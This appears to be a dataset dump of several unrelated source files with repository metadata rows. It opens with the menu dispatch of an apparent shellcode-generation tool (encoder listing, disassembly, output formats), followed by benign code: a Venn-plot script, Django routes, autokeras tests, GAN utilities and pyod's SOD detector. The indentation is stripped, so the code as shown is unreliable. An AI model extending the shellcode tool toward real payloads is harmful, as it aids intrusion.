from .Outputs.Cplusplus import CplusplusFile
if "windows" in string:
CplusplusFile(self.disassembly, True)
else:
CplusplusFile(self.disassembly)
elif terminal[7:8].lower() == "c":
if "windows" in string:
from .Outputs.Cplusplus import CplusplusFile
CplusplusFile(self.disassembly, True)
else:
from .Outputs.C import CFile
CFile(self.disassembly)
elif terminal[7:9].lower() == "py" or terminal[7:13].lower() == "python":
from .Outputs.python import PyFile
PyFile(self.disassembly)
elif terminal[7:10].lower() == "txt":
from .Outputs.txt import TxtFile
TxtFile(self.disassembly)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown output type: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:2].lower() == "ip":
B3mB4m.IP()
self.control(string)
elif terminal[:13] == "show encoders":
from .core.lists import encoderlist
encoderlist()
self.control(string)
elif terminal[:5] == "disas":
B3mB4m().startdisas( self.disassembly, string)
self.control(string)
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
| true
| true
|
790db22589642ac8d0bb393e746a8f9ce6546756
| 2,603
|
py
|
Python
|
gscripts/general/venn_matrix.py
|
YeoLab/gscripts
|
ae653d29d0ce82d342f7f6ff5bbeedd27a2e062b
|
[
"MIT"
] | 12
|
2015-07-10T09:36:49.000Z
|
2021-07-06T03:25:04.000Z
|
gscripts/general/venn_matrix.py
|
YeoLab/gscripts
|
ae653d29d0ce82d342f7f6ff5bbeedd27a2e062b
|
[
"MIT"
] | 43
|
2015-01-21T20:01:38.000Z
|
2021-04-13T17:50:38.000Z
|
gscripts/general/venn_matrix.py
|
YeoLab/gscripts
|
ae653d29d0ce82d342f7f6ff5bbeedd27a2e062b
|
[
"MIT"
] | 19
|
2015-05-02T09:33:17.000Z
|
2022-02-12T17:08:06.000Z
|
from matplotlib import pyplot as plt
from matplotlib_venn import venn2
import glob
import compare_two_zlists as cv
import math
from scipy.stats import hypergeom
from decimal import Decimal
from math import log
def make_venn_matrix(filename_list):
fig1 = plt.figure(1)
fig1.suptitle('Differentially Expressed Genes Overlap', fontsize=24)
subplot_counter = 1
print len(filename_list)*len(filename_list)
for zlist1 in filename_list:
for zlist2 in filename_list:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
offset = math.ceil(float(subplot_counter)/float(len(filename_list)))
position = int(subplot_counter - 1) % len(filename_list) + 1
if zlist1 == zlist2:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
up_A, up_B, all_changing = cv.get_changing(zlist1)
plt.text(0, 0, '{}'.format(zlist1))
plt.text(0, .4, 'Higher in A: {}'.format(str(len(up_A))))
plt.text(0, .2, 'Higher in B: {}'.format(str(len(up_B))))
plt.axis('off')
plt.plot()
print 'working {}'.format(subplot_counter)
subplot_counter+=1
else:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
(venn_values, all_union) = cv.compare_two(zlist1, zlist2)
color1 = ''
color2 = ''
if position > offset:
color1 = 'MediumVioletRed'
color2 = 'OrangeRed'
union = venn_values['up_A']['union']
in_common = venn_values['up_A']['common']
unique_1 = venn_values['up_A']['up_1']
unique_2 = venn_values['up_A']['up_2']
if position < offset:
color1 = 'LimeGreen'
color2 = 'DodgerBlue'
union = venn_values['up_B']['union']
in_common = venn_values['up_B']['common']
unique_1 = venn_values['up_B']['up_1']
unique_2 = venn_values['up_B']['up_2']
total_genes = len(all_union)
total_1 = unique_1 + in_common
total_2 = unique_2 + in_common
try:
log_prob = Decimal(log(hypergeom.sf(in_common, total_genes, total_1, total_2)))
except:
log_prob = '-inf'
plt.plot(cv.draw_venn(union, in_common, unique_1, unique_2, color1, color2))
if log_prob != '-inf':
plt.annotate('log p-value: %2.3f'%log_prob, xy=(0,0), xycoords='axes fraction')
else:
plt.annotate('log p-value: -inf', xy=(0,0), xycoords='axes fraction')
print 'working {}'.format(subplot_counter)
print str(total_genes)
print str(log_prob)
subplot_counter+=1
plt.show()
return
if __name__ == '__main__':
venn_filelist = glob.glob('*zlist')
venn_filelist.sort()
make_venn_matrix(venn_filelist)
| 26.835052
| 84
| 0.676143
|
from matplotlib import pyplot as plt
from matplotlib_venn import venn2
import glob
import compare_two_zlists as cv
import math
from scipy.stats import hypergeom
from decimal import Decimal
from math import log
def make_venn_matrix(filename_list):
fig1 = plt.figure(1)
fig1.suptitle('Differentially Expressed Genes Overlap', fontsize=24)
subplot_counter = 1
print len(filename_list)*len(filename_list)
for zlist1 in filename_list:
for zlist2 in filename_list:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
offset = math.ceil(float(subplot_counter)/float(len(filename_list)))
position = int(subplot_counter - 1) % len(filename_list) + 1
if zlist1 == zlist2:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
up_A, up_B, all_changing = cv.get_changing(zlist1)
plt.text(0, 0, '{}'.format(zlist1))
plt.text(0, .4, 'Higher in A: {}'.format(str(len(up_A))))
plt.text(0, .2, 'Higher in B: {}'.format(str(len(up_B))))
plt.axis('off')
plt.plot()
print 'working {}'.format(subplot_counter)
subplot_counter+=1
else:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
(venn_values, all_union) = cv.compare_two(zlist1, zlist2)
color1 = ''
color2 = ''
if position > offset:
color1 = 'MediumVioletRed'
color2 = 'OrangeRed'
union = venn_values['up_A']['union']
in_common = venn_values['up_A']['common']
unique_1 = venn_values['up_A']['up_1']
unique_2 = venn_values['up_A']['up_2']
if position < offset:
color1 = 'LimeGreen'
color2 = 'DodgerBlue'
union = venn_values['up_B']['union']
in_common = venn_values['up_B']['common']
unique_1 = venn_values['up_B']['up_1']
unique_2 = venn_values['up_B']['up_2']
total_genes = len(all_union)
total_1 = unique_1 + in_common
total_2 = unique_2 + in_common
try:
log_prob = Decimal(log(hypergeom.sf(in_common, total_genes, total_1, total_2)))
except:
log_prob = '-inf'
plt.plot(cv.draw_venn(union, in_common, unique_1, unique_2, color1, color2))
if log_prob != '-inf':
plt.annotate('log p-value: %2.3f'%log_prob, xy=(0,0), xycoords='axes fraction')
else:
plt.annotate('log p-value: -inf', xy=(0,0), xycoords='axes fraction')
print 'working {}'.format(subplot_counter)
print str(total_genes)
print str(log_prob)
subplot_counter+=1
plt.show()
return
if __name__ == '__main__':
venn_filelist = glob.glob('*zlist')
venn_filelist.sort()
make_venn_matrix(venn_filelist)
| false
| true
|
790db4e57c8d5c2412f1dad6e329136609500df2
| 286
|
py
|
Python
|
products/urls.py
|
Nenu1985/blog
|
df94ae3243314d43e16c33d0150a980ce34535a3
|
[
"MIT"
] | null | null | null |
products/urls.py
|
Nenu1985/blog
|
df94ae3243314d43e16c33d0150a980ce34535a3
|
[
"MIT"
] | 13
|
2019-12-04T23:32:05.000Z
|
2022-02-10T12:07:30.000Z
|
products/urls.py
|
Nenu1985/blog
|
df94ae3243314d43e16c33d0150a980ce34535a3
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
path('settings', views.project_settings, name='settings'),
path('envs', views.os_envs, name='envs'),
]
| 26
| 62
| 0.723776
|
from django.urls import path
from . import views
urlpatterns = [
path('settings', views.project_settings, name='settings'),
path('envs', views.os_envs, name='envs'),
]
| true
| true
|
790db547c7710bee45f75044da74e8e17d906927
| 1,459
|
py
|
Python
|
sagas/nlu/pipes/cat.py
|
samlet/stack
|
47db17fd4fdab264032f224dca31a4bb1d19b754
|
[
"Apache-2.0"
] | 3
|
2020-01-11T13:55:38.000Z
|
2020-08-25T22:34:15.000Z
|
sagas/nlu/pipes/cat.py
|
samlet/stack
|
47db17fd4fdab264032f224dca31a4bb1d19b754
|
[
"Apache-2.0"
] | null | null | null |
sagas/nlu/pipes/cat.py
|
samlet/stack
|
47db17fd4fdab264032f224dca31a4bb1d19b754
|
[
"Apache-2.0"
] | 1
|
2021-01-01T05:21:44.000Z
|
2021-01-01T05:21:44.000Z
|
from typing import Text, Any, Dict, List, Union
from blinker import NamedSignal, signal
import rx
from rx import operators as ops
from dataclasses import dataclass
from sagas.nlu.pipes import pred_cond, filter_path, to_token
from sagas.util.collection_util import wrap, to_obj
import logging
logger = logging.getLogger(__name__)
cat_sig=signal('cat')
@cat_sig.connect
def cat_proc(sender, **kwargs):
from sagas.nlu.utils import predicate
from sagas.nlu.translator import trans_axis
results=[]
source = rx.of(*kwargs['rs'])
lang = kwargs['lang']
cond:pred_cond=kwargs['data']
logger.debug(f"pred pos: {cond}")
kind=cond.cond
logger.debug(f"lang: {lang}, cond: {cond}")
source.pipe(
filter_path(cond.part),
ops.map(lambda t: to_obj({'word': t.text if t.upos.lower() in ['adj'] else t.lemma, **t})),
ops.map(lambda t: to_obj({'trans': trans_axis(t.word, lang, t.upos), **t})),
ops.filter(lambda t: predicate(kind, t.trans, 'en', '*')),
ops.map(lambda t: {'path':t.path,
'word': t.word,
'trans': t.trans,
'cat': kind,
'value': kind,
'pos': t.upos.lower()}),
).subscribe(
on_next=lambda value: results.append({**value}),
on_error=lambda e: logger.error(e),
)
logger.debug(f"result: {results}")
return results
| 31.042553
| 99
| 0.59767
|
from typing import Text, Any, Dict, List, Union
from blinker import NamedSignal, signal
import rx
from rx import operators as ops
from dataclasses import dataclass
from sagas.nlu.pipes import pred_cond, filter_path, to_token
from sagas.util.collection_util import wrap, to_obj
import logging
logger = logging.getLogger(__name__)
cat_sig=signal('cat')
@cat_sig.connect
def cat_proc(sender, **kwargs):
from sagas.nlu.utils import predicate
from sagas.nlu.translator import trans_axis
results=[]
source = rx.of(*kwargs['rs'])
lang = kwargs['lang']
cond:pred_cond=kwargs['data']
logger.debug(f"pred pos: {cond}")
kind=cond.cond
logger.debug(f"lang: {lang}, cond: {cond}")
source.pipe(
filter_path(cond.part),
ops.map(lambda t: to_obj({'word': t.text if t.upos.lower() in ['adj'] else t.lemma, **t})),
ops.map(lambda t: to_obj({'trans': trans_axis(t.word, lang, t.upos), **t})),
ops.filter(lambda t: predicate(kind, t.trans, 'en', '*')),
ops.map(lambda t: {'path':t.path,
'word': t.word,
'trans': t.trans,
'cat': kind,
'value': kind,
'pos': t.upos.lower()}),
).subscribe(
on_next=lambda value: results.append({**value}),
on_error=lambda e: logger.error(e),
)
logger.debug(f"result: {results}")
return results
| true
| true
|
790db59cd76ff0c3662434ff66d9e89df5351087
| 6,263
|
py
|
Python
|
tests/test_graph.py
|
MenEnger/autokeras
|
8d96979c49623f7bb56f053ed5d47b3b81f498c0
|
[
"MIT"
] | 1
|
2018-08-06T03:57:51.000Z
|
2018-08-06T03:57:51.000Z
|
tests/test_graph.py
|
MenEnger/autokeras
|
8d96979c49623f7bb56f053ed5d47b3b81f498c0
|
[
"MIT"
] | null | null | null |
tests/test_graph.py
|
MenEnger/autokeras
|
8d96979c49623f7bb56f053ed5d47b3b81f498c0
|
[
"MIT"
] | null | null | null |
from autokeras.generator import DefaultClassifierGenerator
from autokeras.graph import *
from autokeras.net_transformer import legal_graph
from tests.common import get_conv_data, get_add_skip_model, get_conv_dense_model, get_pooling_model, \
get_concat_skip_model
def test_conv_deeper_stub():
graph = get_conv_dense_model()
layer_num = graph.n_layers
graph.to_conv_deeper_model(5, 3)
assert graph.n_layers == layer_num + 4
def test_conv_deeper():
graph = get_conv_dense_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_conv_deeper_model(5, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-1
def test_dense_deeper_stub():
graph = get_conv_dense_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_dense_deeper_model(10)
assert graph.n_layers == layer_num + 3
def test_dense_deeper():
graph = get_conv_dense_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_dense_deeper_model(10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_conv_wider_stub():
graph = get_add_skip_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_wider_model(9, 3)
assert graph.n_layers == layer_num
def test_conv_wider():
graph = get_concat_skip_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_wider_model(5, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-1
def test_dense_wider_stub():
graph = get_add_skip_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_wider_model(32, 3)
assert graph.n_layers == layer_num
def test_dense_wider():
graph = get_add_skip_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_wider_model(32, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_skip_add_over_pooling_stub():
graph = get_pooling_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_add_skip_model(1, 10)
assert graph.n_layers == layer_num + 6
def test_skip_add_over_pooling():
graph = get_pooling_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_add_skip_model(1, 10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_skip_concat_over_pooling_stub():
graph = get_pooling_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_concat_skip_model(1, 14)
assert graph.n_layers == layer_num + 6
def test_skip_concat_over_pooling():
graph = get_pooling_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_concat_skip_model(5, 10)
graph.to_concat_skip_model(5, 10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_extract_descriptor_add():
descriptor = get_add_skip_model().extract_descriptor()
assert descriptor.n_conv == 5
assert descriptor.n_dense == 2
assert descriptor.skip_connections == [(2, 3, NetworkDescriptor.ADD_CONNECT), (3, 4, NetworkDescriptor.ADD_CONNECT)]
def test_extract_descriptor_concat():
descriptor = get_concat_skip_model().extract_descriptor()
assert descriptor.n_conv == 5
assert descriptor.n_dense == 2
assert descriptor.skip_connections == [(2, 3, NetworkDescriptor.CONCAT_CONNECT),
(3, 4, NetworkDescriptor.CONCAT_CONNECT)]
def test_deep_layer_ids():
graph = get_conv_dense_model()
assert len(graph.deep_layer_ids()) == 3
def test_wide_layer_ids():
graph = get_conv_dense_model()
assert len(graph.wide_layer_ids()) == 2
def test_skip_connection_layer_ids():
graph = get_conv_dense_model()
assert len(graph.skip_connection_layer_ids()) == 1
def test_long_transform():
graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
history = [('to_wider_model', 1, 256), ('to_conv_deeper_model', 1, 3),
('to_concat_skip_model', 6, 11)]
for args in history:
getattr(graph, args[0])(*list(args[1:]))
graph.produce_model()
assert legal_graph(graph)
def test_node_consistency():
graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
assert graph.layer_list[6].output.shape == (16, 16, 64)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_wider_model(6, 64)
assert graph.layer_list[6].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_conv_deeper_model(6, 3)
assert graph.layer_list[19].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_add_skip_model(6, 19)
assert graph.layer_list[23].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_concat_skip_model(6, 19)
assert graph.layer_list[25].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
| 26.99569
| 120
| 0.695513
|
from autokeras.generator import DefaultClassifierGenerator
from autokeras.graph import *
from autokeras.net_transformer import legal_graph
from tests.common import get_conv_data, get_add_skip_model, get_conv_dense_model, get_pooling_model, \
get_concat_skip_model
def test_conv_deeper_stub():
graph = get_conv_dense_model()
layer_num = graph.n_layers
graph.to_conv_deeper_model(5, 3)
assert graph.n_layers == layer_num + 4
def test_conv_deeper():
graph = get_conv_dense_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_conv_deeper_model(5, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-1
def test_dense_deeper_stub():
graph = get_conv_dense_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_dense_deeper_model(10)
assert graph.n_layers == layer_num + 3
def test_dense_deeper():
graph = get_conv_dense_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_dense_deeper_model(10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_conv_wider_stub():
graph = get_add_skip_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_wider_model(9, 3)
assert graph.n_layers == layer_num
def test_conv_wider():
graph = get_concat_skip_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_wider_model(5, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-1
def test_dense_wider_stub():
graph = get_add_skip_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_wider_model(32, 3)
assert graph.n_layers == layer_num
def test_dense_wider():
graph = get_add_skip_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_wider_model(32, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_skip_add_over_pooling_stub():
graph = get_pooling_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_add_skip_model(1, 10)
assert graph.n_layers == layer_num + 6
def test_skip_add_over_pooling():
graph = get_pooling_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_add_skip_model(1, 10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_skip_concat_over_pooling_stub():
graph = get_pooling_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_concat_skip_model(1, 14)
assert graph.n_layers == layer_num + 6
def test_skip_concat_over_pooling():
graph = get_pooling_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_concat_skip_model(5, 10)
graph.to_concat_skip_model(5, 10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_extract_descriptor_add():
descriptor = get_add_skip_model().extract_descriptor()
assert descriptor.n_conv == 5
assert descriptor.n_dense == 2
assert descriptor.skip_connections == [(2, 3, NetworkDescriptor.ADD_CONNECT), (3, 4, NetworkDescriptor.ADD_CONNECT)]
def test_extract_descriptor_concat():
descriptor = get_concat_skip_model().extract_descriptor()
assert descriptor.n_conv == 5
assert descriptor.n_dense == 2
assert descriptor.skip_connections == [(2, 3, NetworkDescriptor.CONCAT_CONNECT),
(3, 4, NetworkDescriptor.CONCAT_CONNECT)]
def test_deep_layer_ids():
graph = get_conv_dense_model()
assert len(graph.deep_layer_ids()) == 3
def test_wide_layer_ids():
graph = get_conv_dense_model()
assert len(graph.wide_layer_ids()) == 2
def test_skip_connection_layer_ids():
graph = get_conv_dense_model()
assert len(graph.skip_connection_layer_ids()) == 1
def test_long_transform():
graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
history = [('to_wider_model', 1, 256), ('to_conv_deeper_model', 1, 3),
('to_concat_skip_model', 6, 11)]
for args in history:
getattr(graph, args[0])(*list(args[1:]))
graph.produce_model()
assert legal_graph(graph)
def test_node_consistency():
graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
assert graph.layer_list[6].output.shape == (16, 16, 64)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_wider_model(6, 64)
assert graph.layer_list[6].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_conv_deeper_model(6, 3)
assert graph.layer_list[19].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_add_skip_model(6, 19)
assert graph.layer_list[23].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_concat_skip_model(6, 19)
assert graph.layer_list[25].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
| true
| true
|
790db5e4ea2ac9b7b978a97d923cc49dca6e6b37
| 1,837
|
py
|
Python
|
src/util.py
|
lukamaletin/multi-gan
|
53b37c840d74ed0a9db888a03a5bed59ad33bc8e
|
[
"MIT"
] | null | null | null |
src/util.py
|
lukamaletin/multi-gan
|
53b37c840d74ed0a9db888a03a5bed59ad33bc8e
|
[
"MIT"
] | null | null | null |
src/util.py
|
lukamaletin/multi-gan
|
53b37c840d74ed0a9db888a03a5bed59ad33bc8e
|
[
"MIT"
] | null | null | null |
import os
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
def make_trainable(net, val):
net.trainable = val
for layer in net.layers:
layer.trainable = val
def plot_loss(losses):
plt.figure(figsize=(10, 8))
plt.plot(losses['g'], label='generative loss')
plt.plot(losses['d'], label='discriminitive loss')
plt.legend()
plt.show()
def render_bboxes(bboxes_batch, labels_batch, shape):
renders = []
for i in range(len(bboxes_batch)):
bboxes = bboxes_batch[i]
labels = labels_batch[i]
canvas = np.zeros(shape, dtype=np.float32)
canvas += 255
for j in range(len(bboxes)):
bbox = bboxes[j]
top, left, bottom, right = bbox
label = labels[j]
color = (np.where(label==1)[0][0] + 1) * 10
canvas[top:bottom, left:right, 0] = color
canvas /= 255
renders.append(canvas)
return np.array(renders)
def save_batch(images, epoch, path, suffix=''):
samples_path = os.path.join(path, 'samples')
if not os.path.exists(samples_path):
os.makedirs(samples_path)
num_images = images.shape[0]
num_rows = images.shape[1]
num_cols = images.shape[2]
canvas = np.zeros((num_rows, num_images * num_cols, 1), dtype=images.dtype)
for i in range(num_images):
canvas[0:num_rows, i * num_cols:(i + 1) * num_cols] = images[i]
img = canvas
img *= 255
img = Image.fromarray(np.squeeze(img))
img = img.convert('L')
img.save(samples_path + f'/{epoch}_{suffix}.png')
def load_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.load_weights(model_path)
def save_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.save_weights(model_path)
| 25.513889
| 79
| 0.623299
|
import os
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
def make_trainable(net, val):
net.trainable = val
for layer in net.layers:
layer.trainable = val
def plot_loss(losses):
plt.figure(figsize=(10, 8))
plt.plot(losses['g'], label='generative loss')
plt.plot(losses['d'], label='discriminitive loss')
plt.legend()
plt.show()
def render_bboxes(bboxes_batch, labels_batch, shape):
renders = []
for i in range(len(bboxes_batch)):
bboxes = bboxes_batch[i]
labels = labels_batch[i]
canvas = np.zeros(shape, dtype=np.float32)
canvas += 255
for j in range(len(bboxes)):
bbox = bboxes[j]
top, left, bottom, right = bbox
label = labels[j]
color = (np.where(label==1)[0][0] + 1) * 10
canvas[top:bottom, left:right, 0] = color
canvas /= 255
renders.append(canvas)
return np.array(renders)
def save_batch(images, epoch, path, suffix=''):
samples_path = os.path.join(path, 'samples')
if not os.path.exists(samples_path):
os.makedirs(samples_path)
num_images = images.shape[0]
num_rows = images.shape[1]
num_cols = images.shape[2]
canvas = np.zeros((num_rows, num_images * num_cols, 1), dtype=images.dtype)
for i in range(num_images):
canvas[0:num_rows, i * num_cols:(i + 1) * num_cols] = images[i]
img = canvas
img *= 255
img = Image.fromarray(np.squeeze(img))
img = img.convert('L')
img.save(samples_path + f'/{epoch}_{suffix}.png')
def load_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.load_weights(model_path)
def save_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.save_weights(model_path)
| true
| true
|
790db5f7909e370ab4ab9fd0569746d419b73c10
| 7,068
|
py
|
Python
|
pyod/models/sod.py
|
GBR-613/pyod
|
bfbb297ac067c47488bcade77669c99de5a4838a
|
[
"BSD-2-Clause"
] | 5,126
|
2018-11-09T06:05:38.000Z
|
2022-03-31T14:25:14.000Z
|
pyod/models/sod.py
|
durgeshsamariya/pyod
|
dfafc57f74dc3d49d0166f21ab2ddb97e3d1d898
|
[
"BSD-2-Clause"
] | 325
|
2018-11-14T20:02:39.000Z
|
2022-03-30T22:49:38.000Z
|
pyod/models/sod.py
|
durgeshsamariya/pyod
|
dfafc57f74dc3d49d0166f21ab2ddb97e3d1d898
|
[
"BSD-2-Clause"
] | 1,049
|
2018-11-09T06:12:12.000Z
|
2022-03-31T06:21:28.000Z
|
# -*- coding: utf-8 -*-
"""Subspace Outlier Detection (SOD)
"""
# Author: Yahya Almardeny <almardeny@gmail.com>
# License: BSD 2 clause
import numpy as np
import numba as nb
from sklearn.neighbors import NearestNeighbors
from sklearn.utils import check_array
from ..utils.utility import check_parameter
from .base import BaseDetector
@nb.njit(parallel=True)
def _snn_imp(ind, ref_set_):
"""Internal function for fast snn calculation
Parameters
----------
ind : int
Indices return by kNN.
ref_set_ : int, optional (default=10)
specifies the number of shared nearest neighbors to create the
reference set. Note that ref_set must be smaller than n_neighbors.
"""
n = ind.shape[0]
_count = np.zeros(shape=(n, ref_set_), dtype=np.uint32)
for i in nb.prange(n):
temp = np.empty(n, dtype=np.uint32)
test_element_set = set(ind[i])
for j in nb.prange(n):
temp[j] = len(set(ind[j]).intersection(test_element_set))
temp[i] = np.iinfo(np.uint32).max
_count[i] = np.argsort(temp)[::-1][1:ref_set_ + 1]
return _count
class SOD(BaseDetector):
"""Subspace outlier detection (SOD) schema aims to detect outlier in
varying subspaces of a high dimensional feature space. For each data
object, SOD explores the axis-parallel subspace spanned by the data
object's neighbors and determines how much the object deviates from the
neighbors in this subspace.
See :cite:`kriegel2009outlier` for details.
Parameters
----------
n_neighbors : int, optional (default=20)
Number of neighbors to use by default for k neighbors queries.
ref_set: int, optional (default=10)
specifies the number of shared nearest neighbors to create the
reference set. Note that ref_set must be smaller than n_neighbors.
alpha: float in (0., 1.), optional (default=0.8)
specifies the lower limit for selecting subspace.
0.8 is set as default as suggested in the original paper.
contamination : float in (0., 0.5), optional (default=0.1)
The amount of contamination of the data set, i.e.
the proportion of outliers in the data set. Used when fitting to
define the threshold on the decision function.
Attributes
----------
decision_scores_ : numpy array of shape (n_samples,)
The outlier scores of the training data.
The higher, the more abnormal. Outliers tend to have higher
scores. This value is available once the detector is
fitted.
threshold_ : float
The threshold is based on ``contamination``. It is the
``n_samples * contamination`` most abnormal samples in
``decision_scores_``. The threshold is calculated for generating
binary outlier labels.
labels_ : int, either 0 or 1
The binary labels of the training data. 0 stands for inliers
and 1 for outliers/anomalies. It is generated by applying
``threshold_`` on ``decision_scores_``.
"""
def __init__(self, contamination=0.1, n_neighbors=20, ref_set=10,
alpha=0.8):
super(SOD, self).__init__(contamination=contamination)
if isinstance(n_neighbors, int):
check_parameter(n_neighbors, low=1, param_name='n_neighbors')
else:
raise ValueError(
"n_neighbors should be int. Got %s" % type(n_neighbors))
if isinstance(ref_set, int):
check_parameter(ref_set, low=1, high=n_neighbors,
param_name='ref_set')
else:
raise ValueError("ref_set should be int. Got %s" % type(ref_set))
if isinstance(alpha, float):
check_parameter(alpha, low=0.0, high=1.0, param_name='alpha')
else:
raise ValueError("alpha should be float. Got %s" % type(alpha))
self.n_neighbors_ = n_neighbors
self.ref_set_ = ref_set
self.alpha_ = alpha
self.decision_scores_ = None
def fit(self, X, y=None):
"""Fit detector. y is ignored in unsupervised methods.
Parameters
----------
X : numpy array of shape (n_samples, n_features)
The input samples.
y : Ignored
Not used, present for API consistency by convention.
Returns
-------
self : object
Fitted estimator.
"""
# validate inputs X and y (optional)
X = check_array(X)
self._set_n_classes(y)
self.decision_scores_ = self.decision_function(X)
self._process_decision_scores()
return self
def decision_function(self, X):
"""Predict raw anomaly score of X using the fitted detector.
The anomaly score of an input sample is computed based on different
detector algorithms. For consistency, outliers are assigned with
larger anomaly scores.
Parameters
----------
X : numpy array of shape (n_samples, n_features)
The training input samples. Sparse matrices are accepted only
if they are supported by the base estimator.
Returns
-------
anomaly_scores : numpy array of shape (n_samples,)
The anomaly score of the input samples.
"""
return self._sod(X)
def _snn(self, X):
"""This function is called internally to calculate the shared nearest
neighbors (SNN). SNN is reported to be more robust than k nearest
neighbors.
Returns
-------
snn_indices : numpy array of shape (n_shared_nearest_neighbors,)
The indices of top k shared nearest neighbors for each observation.
"""
knn = NearestNeighbors(n_neighbors=self.n_neighbors_)
knn.fit(X)
# Get the knn index
ind = knn.kneighbors(return_distance=False)
return _snn_imp(ind, self.ref_set_)
def _sod(self, X):
"""This function is called internally to perform subspace outlier
detection algorithm.
Returns
-------
anomaly_scores : numpy array of shape (n_samples,)
The anomaly score of the input samples.
"""
ref_inds = self._snn(X)
anomaly_scores = np.zeros(shape=(X.shape[0],))
for i in range(X.shape[0]):
